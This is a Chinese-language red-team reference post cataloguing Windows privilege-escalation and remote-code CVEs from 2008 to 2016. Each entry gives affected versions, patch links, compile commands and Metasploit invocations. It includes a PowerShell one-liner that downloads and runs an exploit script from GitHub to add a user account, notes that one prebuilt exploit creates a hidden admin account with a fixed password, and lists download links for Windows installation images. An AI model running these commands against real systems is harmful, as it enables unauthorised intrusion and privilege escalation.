近20年Windows权限提升集合(下)

2020-10-27 6,746

声明

郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

前言

这篇文章是基于红蓝功防中的一个小结提取出来的文章,主要都是一些CVE的利用

文章所使用的源码地址

各位师傅麻烦点个Star

  https://github.com/Ascotbe/KernelHub

复现环境

  • 系统环境

    #Windows 7 SP1 X64 
    ed2k://|file|cn_windows_7_home_premium_with_sp1_x64_dvd_u_676691.iso|3420557312|1A3CF44F3F5E0BE9BBC1A938706A3471|/
    #Windows 7 SP1 X86
    ed2k://|file|cn_windows_7_home_premium_with_sp1_x86_dvd_u_676770.iso|2653276160|A8E8BD4421174DF34BD14D60750B3CDB|/
    #Windows Server 2008 R2 SP1 X64 
    ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_x64_dvd_617598.iso|3368839168|D282F613A80C2F45FF23B79212A3CF67|/
    #Windows Server 2003 R2 SP2 x86
    ed2k://|file|cn_win_srv_2003_r2_enterprise_with_sp2_vl_cd1_X13-46432.iso|637917184|284DC0E76945125035B9208B9199E465|/
    #Windows Server 2003 R2 SP2 x64
    ed2k://|file|cn_win_srv_2003_r2_enterprise_x64_with_sp2_vl_cd1_X13-47314.iso|647686144|107F10D2A7FF12FFF0602FF60602BB37|/
    #Windows Server 2008 SP2 x86
    ed2k://|file|cn_windows_server_standard_enterprise_and_datacenter_with_sp2_x86_dvd_x15-41045.iso|2190057472|E93B029**42F19024AA9EF8FB02AC90B|/
    #Windows Server 2000 SP4 x86
    ed2k://|file|ZRMPSEL_CN.iso|402690048|00D1BDA0F057EDB8DA0B29CF5E188788|/
    #Windows Server 2003 SP2 x86
    thunder://QUFodHRwOi8vcy5zYWZlNS5jb20vV2luZG93c1NlcnZlcjIwMDNTUDJFbnRlcnByaXNlRWRpdGlvbi5pc29aWg==
    #Windows 8.1 x86
    ed2k://|file|cn_windows_8_1_enterprise_x86_dvd_2972257.iso|3050842112|6B60ABF8282F943FE92327463920FB67|/
    #Windows 8.1 x64
    ed2k://|file|cn_windows_8_1_x64_dvd_2707237.iso|4076017664|839CBE17F3CE8411E8206B92658A91FA|/
    #Windows 10 1709 x64
    ed2k://|file|cn_windows_10_multi-edition_vl_version_1709_updated_dec_2017_x64_dvd_100406208.iso|5007116288|317BDC520FA2DD6005CBA8293EA06DF6|/
    #Windows 10 2004 x64 (2020-05-21 release version)
    magnet:?xt=urn:btih:8E49569FDE852E4F3CCB3D13EFB296B6B02D82A6
  • 所需Linux编译环境

    sudo vim /etc/apt/sources.list
    #在sources.list末尾添加deb http://us.archive.ubuntu.com/ubuntu trusty main universe
    sudo apt-get update
    sudo apt-get install mingw32 mingw32-binutils mingw32-runtime
    sudo apt-get install gcc-mingw-w64-i686 g++-mingw-w64-i686 mingw-w64-tools
  • 所需Windows编译环境

    VS2019(内置V142、V141、V120、V110、V120_xp、V110_xp、MFC)


CVE-2016-0095

描述

漏洞的原理是空指针解引用,导致Win32k内核提权漏洞的产生

影响版本

Product Version Update Edition Tested
Windows 10 -


Windows 10 1511


Windows 7 - SP1
✔️
Windows 8.1 -


Windows Rt 8.1 -


Windows Server 2008
SP2

Windows Server 2008 R2 SP1
✔️
Windows Server 2012 -


Windows Server 2012 R2


Windows Vista
SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0095

利用方式

项目中的x64版本对于windows 7 sp1 x64和windows server 2008 R2 sp1 x64可以完美利用,项目中的x86版本只能对windows7利用(关闭窗口后会导致蓝屏)

测试windows 7 sp1 x64的GIF图

CVE-2016-0095_win7_x64.gif


CVE-2016-0099

描述

此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行

影响版本

Product Version Update Edition Tested
Windows 10 -


Windows 10 1511


Windows 7 - SP1
✔️
Windows 8.1 -


Windows Rt 8.1 -


Windows Server 2008
SP2
✔️
Windows Server 2008 R2 SP1
✔️
Windows Server 2012 -


Windows Server 2012 R2


Windows Vista
SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0099

利用方式

目标系统需要有2个以上的CPU核心

PS脚本测试,在Windows server 2008 R2 sp1 x64执行下面命令

Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032

还能远程添加账户

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user ascotbe test6666 /add'"

GIF图如下

CVE-2016-0099_win2008_x64_ps.gif

利用exe文件测试通杀x64和x86的所有版本,这边只录制Windows 7 sp1 x64版本的

CVE-2016-0099_win7_x64.gif


CVE-2016-0051

描述

该漏洞存在于Microsoft Web 分布式创作和版本管理 (WebDAV)中,如果 Microsoft Web 分布式创作和版本管理 (WebDAV) 客户端验证输入不当,那么其中就会存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。

影响版本

Product Version Update Edition Tested
Windows 10 -


Windows 10 1511


Windows 7
SP1
✔️
Windows 8.1



Windows Rt 8.1



Windows Server 2008
SP2

Windows Server 2008 R2 SP1

Windows Server 2012 -


Windows Server 2012 R2


Windows Vista
SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0051

利用方式

编译方式

  • VS2019(V140)X86 Debug

需要把CVE-2016-0051_x86.zip解压后的两个文件放到目标中

CVE-2016-0051_win7_x86.gif


CVE-2015-2546

描述

微软安全公告MS15-097修复了Microsoft Graphics组件中多个内核漏洞。其中Win32k内存损坏特权提升漏洞:CVE-2015-2546该漏洞是FireEye在9月8日发布的一份攻击报告中发现的,攻击者利用该漏洞可获得系统SYSTEM权限。

影响版本

Product Version Update Edition Tested
Windows 10 -


Windows 7 - SP1
✔️
Windows 8 -


Windows 8.1 -


Windows Rt -


Windows Rt 8.1 -


Windows Server 2008 - SP2

Windows Server 2008 R2 SP1 itanium
Windows Server 2008 R2 SP1 x64
Windows Server 2012 -


Windows Server 2012 R2


Windows Vista - SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2546

利用方式

编译环境

  • VS2019 (V142)X86 Release

当前只有x86版本的EXP,测试GIF图

CVE-2015-2546_win7_x86.gif


CVE-2015-2370

描述

存在于DCOM/RPC中的漏洞,这个漏洞允许攻击者发起NTLM身份认证请求,然后便可以监听目标主机的TCP套接字通信数据了,将漏洞利用的方式改为向目标主机磁盘的任意位置写入任意文件

影响版本

Product Version Update Edition Tested
Windows 2003 Server
SP2

Windows 2003 Server R2 SP2

Windows 7 - SP1
✔️
Windows 8 -


Windows 8.1 -

✔️
Windows Rt -


Windows Rt 8.1 -


Windows Server 2008 - SP2

Windows Server 2008 R2 SP1

Windows Server 2012 -


Windows Server 2012 R2
datacenter
Windows Server 2012 R2
essentials
Windows Server 2012 R2
standard
Windows Vista
SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2370

利用方式

编译方式

  • VS2019 Any CPU Release

x64/x86 Windows 7/8.1都可以利用成功,这个漏洞就是可以像任意文件目录写入文件,就比如说我在c:\windows\system32\这个目录没有权限写入文件,但是我可以利用漏洞在这个文件写入文件

#把桌面的test.txt文件写入到System32文件夹中
Trebuchet.exe c:\Users\ascotbe\Desktop\test.txt c:\Windows\System32\test1.txt

CVE-2015-2370_win7_x86.png


CVE-2015-0003

描述

允许本地用户通过精心设计的应用程序(也称为“ Win32k特权提升漏洞”)获得特权或导致拒绝服务(取消引用空指针)。

影响版本

Product Version Update Edition Tested
Windows 7 - SP1
✔️
Windows 8 -


Windows 8.1 -


Windows Rt -


Windows Rt 8.1 -


Windows Server 2003 - SP2

Windows Server 2008 - SP2

Windows Server 2008 R2 SP1 itanium
Windows Server 2008 R2 SP1 x64
Windows Server 2012 -


Windows Server 2012 R2


Windows Vista - SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0003

利用方式

X86机器利用

编译方式

  • VS2019 (V120_xp)X86 Release

利用windows 7 sp1 x86作为演示

CVE-2015-0003_win7_x86.gif

x64利用

编译方式

  • VS2019 (V142)X64 Release

利用Windows server 2008 R2 sp1 x64进行测试

CVE-2015-0003_win2008_x64.gif


CVE-2015-1725

描述

这个是一个位于 win32k.sys 的释放后重用漏洞。 漏洞的起因是没有为用户模式回调函数给窗口内核类型加锁, 该漏洞可以由 win32k.sys 中的 xxxSetClassLong 函数触发。 成功利用该漏洞将导致特权提升到“NT AUTHORITY/SYSTEM”。

影响版本

Product Version Update Edition Tested
Windows 7 - SP1

Windows 8 -


Windows 8.1 -


Windows Rt -


Windows Rt 8.1 -


Windows Server 2003 - SP2

Windows Server 2003 R2 SP2

Windows Server 2008 - SP2

Windows Server 2008 R2 SP1 itanium
Windows Server 2008 R2 SP1 x64
Windows Server 2012 -


Windows Server 2012 R2


Windows Vista - SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1725

利用方式

暂无


CVE-2015-1701

描述

如果 Win32k.sys 内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。 成功利用此漏洞的攻击者可以运行内核模式中的任意代码。

影响版本

Product Version Update Edition Tested
Windows 2003 Server
SP2

Windows 7 - SP1 x64
Windows Server 2008 - SP2

Windows Vista
SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1701

利用方式

编译方式

  • VS2019 (V140)X64 Release

  • VS2019 (V140)X86 Release

x86利用

测试机器 windows 7 sp1 x86

CVE-2015-1701_win7_x86.gif

x64利用

测试使用windows server 2008 R2 sp1 x64

CVE-2015-1701_win2008_x64.gif


CVE-2015-0062

描述

允许本地用户通过精心设计的应用程序获取特权,这些应用程序在使用过程中利用了不正确的模拟处理 SeAssignPrimaryTokenPrivilege特权。

影响版本

Product Version Update Edition Tested
Windows 7 - SP1

Windows 8 -


Windows 8.1 -


Windows Rt -


Windows Rt 8.1 -


Windows Server 2008 R2 SP1 itanium
Windows Server 2008 R2 SP1 x64
Windows Server 2012 -


Windows Server 2012 R2


修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0062

利用方式

暂无


CVE-2015-0057

描述

内核模式驱动程序中的win32k.sys允许本地用户通过精心设计的应用程序获得特权

影响版本

Product Version Update Edition Tested
Windows 7 - SP1
✔️
Windows 8 -


Windows 8.1 -


Windows Rt -


Windows Rt 8.1 -


Windows Server 2003 - SP2

Windows Server 2008 - SP2

Windows Server 2008 R2 SP1 itanium ✔️
Windows Server 2008 R2 SP1 x64 ✔️
Windows Server 2012 -


Windows Server 2012 R2


Windows Vista - SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0057

利用方式

目前有两个源码

  1. CVE-2015-0057_win8.1文件夹下面的针对Windows8.1的源码,可行性未测试

  2. exploit-db下载下来的源码也未测试

测试使用的是网上找到的编译好的EXPCVE-2015-0057_x86CVE-2015-0057_x64,可以对Windows7/2008利用成功,会添加用户账号k8team$ 密码K8TeAm520!@#

对Windows 7 sp1 x86进行测试

CVE-2015-0057_win7_sp1_x86.gif


CVE-2015-0002

描述

应用程序兼容性组件中的ahcache.sys中的ahcache.sys中的AhcVerifyAdminContext函数不会验证模拟令牌 与一个管理帐户关联,该帐户允许本地用户通过使用精心制作的DLL文件运行AppCompatCache.exe来获得特权。

影响版本

Product Version Update Edition Tested
Windows 7 - SP1

Windows 8 -


Windows 8.1 -


Windows Rt - Gold

Windows Rt 8.1 -


Windows Server 2008 R2 SP1

Windows Server 2012 - Gold

Windows Server 2012 R2
x64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0002

利用方式

暂无


CVE-2014-4076

描述

本地用户通过对tcpip.sys或tcpip6.sys的精心制作的IOCTL调用来获得特权。

影响版本

Product Version Update Edition Tested
Windows Server 2003
SP2 x86
Windows Server 2003
SP2 tanium
Windows Server 2003
SP2 x64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4076

利用方式

编译环境

i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe

CVE-2014-4076_win2003_x86.gif


CVE-2014-4113

描述

如果 Win32k.sys 内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。 成功利用此漏洞的攻击者可以运行内核模式中的任意代码。

影响版本

Product Version Update Edition Tested
Windows 7 - SP1
✔️
Windows 8 -


Windows 8.1 -


Windows Rt - Gold

Windows Rt 8.1 -


Windows Server 2003
SP2

Windows Server 2008
SP2

Windows Server 2008 R2 SP1

Windows Server 2012 - Gold

Windows Server 2012 R2


Windows Vista
SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4113

利用方式

目前只有x86版本的源码,x64源码没有找到

编译方式

  • VS2019 (V140)X86 Release

x86利用

测试系统Windows 7 sp1 x86

CVE-2014-4113_win7_x86.gif

x64利用

测试系统Windows 7 sp1 x64

CVE-2014-4113_win7_x64.gif


CVE-2014-6321

描述

Schannel允许远程攻击者通过精心设计的数据包远程执行代码

影响版本

Product Version Update Edition Tested
Windows 7 - SP1

Windows 8 -


Windows 8.1 -


Windows Rt -


Windows Rt 8.1 -


Windows Server 2003 - SP2

Windows Server 2008 - SP2

Windows Server 2008 R2 SP1 itanium
Windows Server 2008 R2 SP1 x64
Windows Server 2012 -


Windows Server 2012 R2


Windows Vista - SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6321

利用方式

暂无


CVE-2014-1767

描述

内核模式驱动程序中afd.sys的辅助功能驱动程序(AFD)中的双重释放漏洞允许本地用户通过精心设计的应用程序获得特权。

影响版本

Product Version Update Edition Tested
Windows 7
SP1
✔️
Windows 8



Windows 8.1



Windows Rt -


Windows Rt 8.1 -


Windows Server 2003
SP2

Windows Server 2008
SP2

Windows Server 2008 R2 SP1

Windows Server 2012 -


Windows Server 2012 R2


Windows Vista
SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1767

利用方式

利用脚本是python的,还有编译好的exe版本

x86利用

测试系统Windows 7 sp1 x86 ,测试exe文件和py脚本都可以正常利用

CVE-2014-1767_win7_x86.gif

x64利用

测试系统Windows 7 sp1 x64 测试利用py脚本,exe文件有机率蓝屏

CVE-2014-1767_win7_x64.gif


CVE-2014-4076

描述

本地用户通过对tcpip.sys或tcpip6.sys的精心制作的IOCTL调用来获得特权。

影响版本

Product Version Update Edition Tested
Windows Server 2003
SP2 x64
Windows Server 2003
SP2 x86 ✔️
Windows Server 2003
SP2 itanium

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4076

利用方式

编译环境

i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe

CVE-2014-4076_win2003_x86.gif


CVE-2013-5065

描述

内核中的NDProxy.sys允许本地用户通过精心设计的应用程序获得特权

影响版本

Product Version Update Edition Tested
Windows 2003 Server
SP2

Windows Xp
SP2

Windows Xp
SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-5065

利用方式

暂无

i586-mingw32msvc-gcc CVE-2013-5065.c -o CVE-2013-5065.exe


CVE-2013-1345

描述

内核模式驱动程序中的win32k.sys不会 正确处理内存中的对象,这允许本地用户通过精心设计的应用程序获得特权。

影响版本

Product Version Update Edition Tested
Windows 7
SP1 X64
Windows 7
SP1 X86 ✔️
Windows 8 - - X64
Windows 8 - - X86
Windows Rt -


Windows Server 2003
SP2

Windows Server 2003
SP2 Itanium
Windows Server 2003
SP2 X64
Windows Server 2008
SP2 Itanium
Windows Server 2008
SP2 X64
Windows Server 2008
SP2 X86 ✔️
Windows Server 2008 R2 SP1 Itanium ✔️
Windows Server 2008 R2 SP1 X64
Windows Server 2012 -


Windows Vista
SP2

Windows Vista
SP2 X64
Windows Xp - SP2 X64
Windows Xp
SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-1345

利用方式

X86利用

测试系统windows 7 sp1 x86 ,直接使用msf即可,我们当机器已经上线了

use exploit/windows/local/ms13_053_schlamperei
set SESSION 2 #你上线机器的session
run

CVE-2013-1345_win7_x86.png

Windows sever 2003 sp2 x86 和Windows sever 2003 R2 sp2 x86都测试成功,但是利用文件没有源码只有exe可执行文件

Windows sever 2003 sp2 x86 动图如下

CVE-2013-1345_win2003_x86.gif

Windows sever 2003 R2 sp2 x86 动图如下

CVE-2013-1345_win2003_x86_2.gif


CVE-2013-1332

描述

核模式驱动程序中的dxgkrnl.sys(aka DirectX图形内核子系统) 在内存中,本地用户可以通过精心设计的应用程序获得特权。

影响版本

Product Version Update Edition Tested
Windows 7 - SP1 X64
Windows 7 - SP1 X86
Windows 8 - - X64
Windows 8 - - X86
Windows Rt -


Windows Server 2003
SP2

Windows Server 2008
SP2 Itanium
Windows Server 2008
SP2 X64
Windows Server 2008
SP2 X86
Windows Server 2008 R2 SP1 X64
Windows Server 2008 R2 SP1 Itanium
Windows Server 2012 -


Windows Vista - SP2

Windows Vista
SP2 X64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-1332

利用方式

编译环境

  • VS2019(V120_xp)X64 Release

  • VS2019(V120_xp)X86 Release

  • 字符集需要替换成多字节字符集不然无法利用

测试系统windows server 2003 SP2

CVE-2013-1332_win2003_x86.gif


CVE-2013-0008

描述

内核模式驱动程序中的win32k.sys无法正确处理窗口广播消息, 它允许本地用户通过精心设计的应用程序获得特权

影响版本

Product Version Update Edition Tested
Windows 7 - SP1 X64
Windows 7

X64
Windows 7

X86
Windows 7
SP1 X86
Windows 8 - - X64
Windows 8 - - X86
Windows Rt -


Windows Server 2008 - SP2 Itanium
Windows Server 2008
SP2 X64
Windows Server 2008
SP2 X86
Windows Server 2008 R2
Itanium
Windows Server 2008 R2
X64
Windows Server 2008 R2 SP1 Itanium
Windows Server 2008 R2 SP1 X64
Windows Server 2012 -


Windows Vista
SP2

Windows Vista
SP2 X64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-0008

利用方式

msf 利用失败


CVE-2012-0217

描述

某些其他操作系统(在Intel处理器上运行时)在某些地址不是规范地址的情况下会错误地使用sysret路径,从而使本地用户可以通过精心设计的应用程序获得特权

影响版本

Product Version Update Edition Tested
Windows 7
SP1 X64
Windows 7

X64
Windows Server 2003
SP2

Windows Server 2008 R2
X64
Windows Server 2008 R2 SP1 X64 ✔️
Windows Xp
SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2012-0217

利用方式

编译环境

  • VS2019(V100)X64 Release

测试系统windows server 2008 R2 ps1 x64

CVE-2012-0217_win2008_x64.gif


CVE-2011-2005

描述

辅助功能驱动程序中的afd.sys无法正确验证传递给内核模式的用户模式输入,这允许本地用户通过精心设计的应用程序获得特权。

影响版本

Product Version Update Edition Tested
Windows 2003 Server
SP2

Windows Server 2003
SP2 Itanium ✔️
Windows Server 2003
SP2 X64
Windows Xp - SP2 X64
Windows Xp
SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-2005

利用方式

测试系统windows server 2003 sp2 x86

CVE-2011-2005_win2003_x86.gif

msf利用直接使用这个即可

use exploit/windows/local/ms11_080_afdjoinleaf

CVE-2011-2005_win2003_x86.gif


CVE-2011-1974

描述

远程访问服务(RAS)中的NDISTAPI驱动程序中的NDISTAPI.sys无法正确验证用户模式输入,这允许本地用户通过精心设计的应用程序获得特权

影响版本

Product Version Update Edition Tested
Windows 2003 Server
SP2

Windows Server 2003
SP2 Itanium
Windows Server 2003
SP2 X64
Windows Xp - SP2 X64
Windows Xp
SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-1974

利用方式

编译命令

i686-w64-mingw32-gcc CVE-2011-1974.c -o CVE-2011-1974.exe -lws2_32

测试系统windows server 2003 sp2 x86,首先需要用管理员修改注册表和开启服务

CVE-2011-1974_win2003_x86.png

接着切回普通用户

CVE-2011-1974_win2003_x86.gif

CVE-2011-1249

描述

afd.sys中的辅助功能驱动程序(AFD)未正确验证用户模式输入,从而使本地用户无法通过精心设计的应用程序获得特权。

影响版本

Product Version Update Edition Tested
Windows 2003 Server
SP2

Windows 7 - SP1 X64
Windows 7 - SP1 X86
Windows Server 2003
SP2 Itanium
Windows Server 2003
SP2 X64
Windows Server 2008 - SP2 Itanium
Windows Server 2008

X32
Windows Server 2008

X64
Windows Server 2008
SP2 X32
Windows Server 2008
SP2 X64
Windows Server 2008

Itanium
Windows Server 2008 R2
Itanium
Windows Server 2008 R2
X64
Windows Server 2008 R2 SP1 Itanium
Windows Server 2008 R2 SP1 X64
Windows Vista
SP1

Windows Vista
SP2

Windows Xp - SP2 X64
Windows Xp
SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-1249

利用方式

编译文件

i686-w64-mingw32-gcc CVE-2011-1249.c -o CVE-2011-1249.exe -lws2_32

测试系统windows server 2003 sp2 x86和windows 7 sp1 x86都成功

CVE-2011-1249_win2003_x86.gif

CVE-2011-0045

描述

内核中的跟踪事件功能无法正确执行类型转换,这会导致整数截断和不足的内存分配并触发缓冲区溢出,从而使本地用户可以通过与WmiTraceMessageVa相关的精心设计的应用程序获得特权

影响版本

Product Version Update Edition Tested
Windows Xp
SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-0045

利用方式

暂无

CVE-2010-4398

描述

win32k.sys中的RtlQueryRegistryValues函数中基于堆栈的缓冲区溢出 特权,并通过为SystemDefaultEUDCFont注册表项的特制REG_BINARY值来绕过用户帐户控制(UAC)功能。

影响版本

Product Version Update Edition Tested
Windows 2003 Server



Windows 7



Windows Server 2008

Itanium
Windows Server 2008

X32
Windows Server 2008

X64
Windows Server 2008 R2
Itanium
Windows Server 2008 R2
X64
Windows Vista



Windows Xp



修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-4398

利用方式

暂无

CVE-2010-3338

描述

Windows Task Scheduler无法正确确定计划任务的安全上下文,这使本地用户可以通过精心设计的应用程序获取特权

影响版本

Product Version Update Edition Tested
Windows 7 -


Windows Server 2008 - SP2 Itanium
Windows Server 2008

X64
Windows Server 2008
SP2 X32
Windows Server 2008
SP2 X64
Windows Server 2008

Itanium
Windows Server 2008

X32
Windows Server 2008 R2
X64
Windows Server 2008 R2
Itanium
Windows Vista
SP1

Windows Vista
SP1 X64
Windows Vista
SP2

Windows Vista
SP2 X64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-3338

利用方式

测试系统 windows server 2008 sp2 x86,利用msf执行如下命令即可,x64版本msf不支持

use exploit/windows/local/ms10_092_schelevator
set SESSION 2
run

CVE-2010-3338_win2008_x86_msf.png

然后就能提权成功了

CVE-2010-3338_win2008_x86_msf2.png

CVE-2010-2554

描述

服务跟踪功能在其注册表项上具有不正确的ACL,这使本地用户可以通过涉及命名管道和模拟的向量获得特权。

影响版本

Product Version Update Edition Tested
Windows 7 -


Windows Server 2008 - SP2 Itanium
Windows Server 2008
R2 Itanium
Windows Server 2008
R2 X64
Windows Server 2008
SP2 X32
Windows Server 2008

Itanium
Windows Server 2008
SP2 X64
Windows Server 2008

X32
Windows Server 2008

X64
Windows Vista - SP1

Windows Vista - SP2

Windows Vista
SP1 X64
Windows Vista
SP2

Windows Vista
SP2 X64
Windows Vista
SP1

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-2554

利用方式

暂无

CVE-2010-1897

描述

win32k.sys中的Windows内核模式驱动程序无法正确验证伪句柄值 在窗口创建期间的回调参数中,它允许本地用户通过精心设计的应用程序获得特权。

影响版本

Product Version Update Edition Tested
Windows 2003 Server
SP2

Windows 2003 Server
SP2 Itanium
Windows 7 -


Windows 7



Windows Server 2003
SP2 X64
Windows Server 2008 - SP2 Itanium
Windows Server 2008

X64
Windows Server 2008
R2 Itanium
Windows Server 2008
R2 X64
Windows Server 2008
SP2 X32
Windows Server 2008

Itanium
Windows Server 2008
SP2 X64
Windows Server 2008

X32
Windows Vista - SP1

Windows Vista
SP1

Windows Vista
SP1 X64
Windows Vista
SP2

Windows Vista
SP2 X64
Windows Xp - SP2 X64
Windows Xp
SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-1897

利用方式

测试系统windows server 2003 sp2 x86

CVE-2010-1897_win2003_x86.gif

CVE-2010-0233

描述

内核中的双重免费漏洞允许本地用户通过精心设计的应用程序获得特权。

影响版本

Product Version Update Edition Tested
Windows 2000 SP4


Windows Server 2003
SP2

Windows Server 2008 - SP2 Itanium
Windows Server 2008
SP2 X64
Windows Server 2008

Itanium
Windows Server 2008

X32
Windows Server 2008

X64
Windows Server 2008 SP2 X32

Windows Vista



Windows Vista SP1


Windows Vista SP2


Windows Xp -


Windows Xp SP3


修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-0233

利用方式

编译环境

  • nmake 2013

测试系统windows server 2003 sp2 x86

CVE-2010-0233_win2003_x86.gif

msf利用

测试系统windows server 2003 sp2 x86,执行以下代码

use exploit/windows/local/ms10_015_kitrap0d
set SESSION 3
run

可以看到当前权限是最低的

CVE-2010-0233_win2003_x86_msf.png

然后执行命令提权

CVE-2010-0233_win2003_x86_msf2.png

CVE-2010-0270

描述

SMB客户端无法正确验证SMB事务响应中的字段,这允许远程SMB服务器和中间人攻击者执行任意代码或导致拒绝服务(内存损坏和 通过SMBv1或SMBv2响应重新启动)。

影响版本

Product Version Update Edition Tested
Windows 7 -


Windows 7



Windows Server 2008
R2 Itanium
Windows Server 2008
R2 X64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-0270

利用方式

暂无

CVE-2009-2532

描述

无法正确处理SMB多协议协商请求数据包中的命令值,这使远程攻击者可以通过精心制作的SMBv2执行任意代码 数据包发送到服务器服务

影响版本

Product Version Update Edition Tested
Windows Server 2008 -


Windows Server 2008 - SP2

Windows Server 2008 - SP2 Itanium
Windows Server 2008 - SP2 X64
Windows Server 2008 - SP2 X86
Windows Server 2008

Itanium
Windows Server 2008

X32
Windows Server 2008

X64
Windows Vista - SP1

Windows Vista - SP2

Windows Vista

X64
Windows Vista
SP1 X64
Windows Vista
SP2 X64
Windows Vista



修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2009-2532

利用方式

利用msf 测试系统windows server 2008 sp2 x86

use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS 192.168.1.13 #目标IP
run

CVE-2009-2532_win2008_x86_msf.png

CVE-2009-0079

描述

RPCSS服务不能在一组不同的进程之间正确实现隔离,这些进程全部在NetworkService帐户下运行,或者所有在LocalService帐户下运行,这允许 本地用户通过访问其中一个进程的资源来获得特权。

影响版本

Product Version Update Edition Tested
Windows Server 2003
SP1

Windows Server 2003
SP1 Itanium
Windows Server 2003
SP2

Windows Server 2003
SP2 Itanium
Windows Server 2003
SP2 X64
Windows Server 2003

X64
Windows Xp

Pro X64
Windows Xp
SP2

Windows Xp
SP2 Pro X64
Windows Xp
SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2009-0079

利用方式

暂无

CVE-2008-4037

描述

通过远程SMB服务器可以重播客户端用户的NTLM凭据在客户端计算机上执行任意代码

影响版本

Product Version Update Edition Tested
Windows XP
SP2

Windows XP
SP2 X64
Windows XP
SP3

Windows XP
Unknown X64
Windows Server 2003
SP1 Itanium
Windows Server 2003
SP2

Windows Server 2003
SP2 Itanium
Windows Server 2003
SP2 X64
Windows Server 2003
Unknown X64
Windows Server 2003
SP1

Windows 2000 - SP4

Windows Server 2008 -
X32
Windows Server 2008 -
X64
Windows Server 2008 -
Itanium
Windows Vista - SP1 X64
Windows Vista -


Windows Vista -
X64
Windows Vista - SP1

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-4037

利用方式

使用msf 测试系统windows server 2003 sp2 x86

use exploit/windows/smb/smb_relay
set SMBHOST 192.168.1.14 #目标IP
run

CVE-2008-4037_win2003_x86_msf.png

CVE-2008-4250

描述

Pre-Beta中的Server服务允许远程攻击者通过精心设计的RPC请求执行任意代码,该请求会在执行以下操作时触发溢出路径规范化。

影响版本

Product Version Update Edition Tested
Windows 2000
SP4

Windows Server 2003
SP1

Windows Server 2003
SP1 Itanium
Windows Server 2003
SP2

Windows Server 2003
SP2 Itanium
Windows Server 2003
SP2 X64
Windows Server 2003

X64
Windows Server 2008

X32
Windows Server 2008

X64
Windows Server 2008

Itanium
Windows Vista
SP1 X64
Windows Vista



Windows Vista

X64
Windows Vista
SP1

Windows Xp

Professional X64
Windows Xp
SP2

Windows Xp
SP2 Professional X64
Windows Xp
SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-4250

利用方式

使用msf 测试系统windows server 2003 sp2 x86

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.14
run

CVE-2008-4250_win2003_x86_msf.png

CVE-2008-3464

描述

